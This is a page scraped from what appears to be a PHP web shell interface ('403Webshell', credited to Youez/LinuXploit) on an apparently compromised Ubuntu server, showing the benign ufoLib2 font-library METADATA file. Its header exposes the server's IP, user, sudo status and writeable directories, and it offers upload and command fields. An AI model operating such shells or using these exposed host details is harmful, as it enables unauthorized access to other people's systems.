403Webshell
Server IP : 35.80.110.71  /  Your IP : 216.73.216.221
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux ip-172-31-21-44 6.17.0-1019-aws #19~24.04.1-Ubuntu SMP Tue Jun 23 18:53:06 UTC 2026 x86_64
User : ubuntu ( 1000)
PHP Version : 8.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /lib/python3/dist-packages/ufoLib2-0.16.0.dist-info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /lib/python3/dist-packages/ufoLib2-0.16.0.dist-info/METADATA
Metadata-Version: 2.1
Name: ufoLib2
Version: 0.16.0
Summary: ufoLib2 is a UFO font processing library.
Home-page: https://github.com/fonttools/ufoLib2
Author: Adrien Tétar
Author-email: adri-from-59@hotmail.fr
License: Apache 2.0
Classifier: Development Status :: 4 - Beta
Classifier: Operating System :: OS Independent
Classifier: Programming Language :: Python :: 3
Classifier: Intended Audience :: Developers
Classifier: Intended Audience :: End Users/Desktop
Classifier: Topic :: Text Processing :: Fonts
Classifier: License :: OSI Approved :: Apache Software License
Requires-Python: >=3.7
Description-Content-Type: text/markdown
License-File: LICENSE
Requires-Dist: attrs (>=22.1.0)
Requires-Dist: fonttools[ufo] (>=4.0.0)
Requires-Dist: typing-extensions ; python_version < "3.8"
Provides-Extra: converters
Requires-Dist: cattrs (>=22.2.0) ; extra == 'converters'
Provides-Extra: json
Requires-Dist: cattrs (>=22.2.0) ; extra == 'json'
Requires-Dist: orjson ; (platform_python_implementation != "PyPy") and extra == 'json'
Provides-Extra: lxml
Requires-Dist: lxml ; extra == 'lxml'
Provides-Extra: msgpack
Requires-Dist: cattrs (>=22.2.0) ; extra == 'msgpack'
Requires-Dist: msgpack ; extra == 'msgpack'

# ufoLib2

ufoLib2 is meant to be a thin representation of the Unified Font Object (UFO) version 3 data model, intended for programmatic manipulation and fast batch processing of UFOs.

It resembles the defcon library, but does without notifications, the layout engine and other support classes. Where useful and possible, ufoLib2 tries to be API-compatible with defcon.

It does not replace `fontTools.ufoLib` but builds on it. The eventual goal is to merge it into `fontTools.ufoLib.objects`.

Documentation: https://ufolib2.readthedocs.io/en/latest/

Youez - 2016 - github.com/yon3zu
LinuXploit